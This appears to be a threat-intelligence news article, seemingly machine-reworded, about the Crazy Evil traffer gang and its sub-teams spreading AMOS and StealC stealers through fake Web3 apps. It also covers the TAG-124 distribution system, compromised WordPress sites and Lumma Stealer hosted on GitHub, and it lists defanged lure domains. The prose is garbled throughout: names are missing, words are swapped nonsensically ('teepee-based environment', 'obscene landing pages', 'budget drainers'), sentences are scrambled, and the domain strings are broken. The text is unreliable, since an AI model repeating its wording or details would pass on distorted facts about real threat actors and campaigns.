Over 10 effective social press scams that rely on a wide range of targeted lures to mislead victims and key them into installing trojan like , Atomic macOS Stealer (aka ), and have been linked to a Russian-speaking crime gang known as Crazy Evil.
” Specializing in identity fraud, crypto robbery, and information-stealing malware, Crazy Evil employs a well-coordinated system of traffers — social engineering professionals tasked with redirecting legitimate traffic to malicious phishing pages”, Recorded Future’s Insikt Group in an examination.
The use of a different ransomware army cryptoscam group is a signal that the danger actor is attempting to target users of both Windows and macOS systems, putting a risk on the fragmented finance ecosystem.
Since at least 2021, Crazy Evil has been deemed to be effective, mainly as a traffer group tasked with directing legitimate traffic to obscene landing pages operated by various criminal organizations. Allegedly run by a threat actor known on Telegram as @AbrahamCrazyEvil, it serves over 4, 800 subscribers on the messaging platform (@CrazyEvilCorp ) as of writing.
In a detailed record about traffer services in August 2022, French cybersecurity company Sekoia stated that they “monetize the visitors to these malware operators who intend to deal users either broadly, or particularly, to a region, or an operating system.”
So,” Traffer’s main challenge is to create high-quality traffic without bots, untold or analyzed by security vendors, and ultimately filtered by traffic type. In other words, traffers ‘ exercise is a form of direct generation”.
Unlike that revolve around setting up counterfeit shopping sites to facilitate fraudulent transactions, Crazy Evil focuses on the theft of digital assets involving non-fungible tokens ( NFTs ), cryptocurrencies, payment cards, and online banking accounts. It is thought to have compromised tens of thousands of devices around the world and generated more than$ 5 million in illicit revenue.
In response to leave scams involving two other crime organizations, and , both of whom Sekoia had previously identified as being responsible for a using false Google Meet pages in October 2024, it has also gained new fame.
According to Recorded Future,” Crazy Evil directly victimizes the cryptocurrency space with specialized spear-phishing lures.” ” Crazy Evil traffers occasionally take days or weeks of recon time to reach activities, identify goals, and initiate commitments”.
The team’s administrators claim to provide training manuals and assistance for its taffers and for harmful payloads and boast of an online framework to outsource the operations. They also claim to orchestrate attack chains that deliver information stealers and budget drainers.
The next crime organization to be exposed in recent years, Crazy Evil, operates in a teepee-based environment. A danger actor-controlled Telegram bot directs recently hired affiliates to other personal channels.
- Bills, which announces profits for traffers
- Logbar, which provides an audit trail of information grabber problems, information about stolen information, and if the goals are follow victims
- Info, which periodically updates Traffers ‘ technical and administrative information.
- International Talk, the primary gathering place for discussions ranging from job to memes, serves as its primary communication channel.
The crime group has been found to include six sub-teams, AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, each of which has been attributed to a particular scam that involves duping victims into installing the tool from fraudulent websites-
- Using job offer and investment scams to spread StealC and AMOS stealers under the guise of a Web3 communication tool called Voxium ( “voxiumcalls [ .]], AVLAND ( also known as AVS | RG or AVENGE ), uses job offer and investment scams. com” )
- TYPED, which uses an artificial intelligence program called TyperDex ( “typerdex [ .]] ] to propagate the AMOS stealer. ai” )
- DELAND, which uses a community development platform called DeMeet ( “demeet [ .]] ) to promote the AMOS stealer. app” )
- ZOOMLAND, which leverages generic scams impersonating Zoom and WeChat ( “app-whechat [. ] com” ) to propagate the AMOS stealer
- DEFI, which spreads the AMOS stealer using the alias of a Selenium Finance digital asset management system (. ) fi” )
- KEVLAND, which uses Gatherum, an AI-enhanced virtual meeting software, to promote the AMOS stealer. ca” )
Other cybercriminal organizations are likely to imitate Crazy Evil’s methods, which makes security teams must remain vigilant to prevent widespread breaches and the erosion of trust in the cryptocurrency, gaming, and software sectors, according to Recorded Future.
The development comes as the cybersecurity company exposed a traffic distribution system ( TDS ) dubbed TAG-124, which overlaps with activity clusters known as , , , and . Multiple threat groups, including those associated with , , , , and have been found to use the TDS in their initial infection sequences.
“TAG-124 comprises a network of compromised WordPress sites, actor-controlled payload servers, a central server, a suspected management server, an additional panel, and other components”, it . The compromised WordPress websites display fake Google Chrome update landing pages, which ultimately lead to malware infections, if visitors meet a certain criteria.
Additionally, Recorded Future noted that TAG-124’s use reinforces the link between the and that recent TAG-124 campaigns used the ClickFix method, which requires users to copy a command directly from a clipboard to launch the malware infection.
Remcos RAT and ( also known as Broomstick or Oyster ), two of the payloads that were used to transport ransomware Rhysida and Interlock, are some examples of the deployments.
More than 10,000 compromised WordPress sites have been discovered as a distribution channel for AMOS and SocGholish as a result of what has been referred to as a client-side attack, totaling more than 10,000.
According to c/side researcher Himanshu Anand,” JavaScript loaded in the user’s browser generates the fake page in an iframe.” Without a client-side monitoring tool in place, the attackers “use outdated WordPress versions and plugins to make detection more difficult for websites.”
Additionally, threat actors have used popular platforms like GitHub to host malicious installers that led to the deployment of Lumma Stealer and other payloads like SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.
The tactics used by a threat actor known as , who has a track record of using GitHub repositories for payload distribution, have significant overlaps with Trend Micro’s activities. The infection chain, however, starts with infected websites that point to shady GitHub release links.
Security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego that the distribution strategy for Lumma Stealer is evolving, with the threat actor now using GitHub repositories to host malware.
” The malware-as-a-service ( MaaS ) model provides malicious actors with a cost-effective and accessible means to execute complex cyberattacks and achieve their malicious objectives, easing the distribution of threats such as Lumma Stealer”.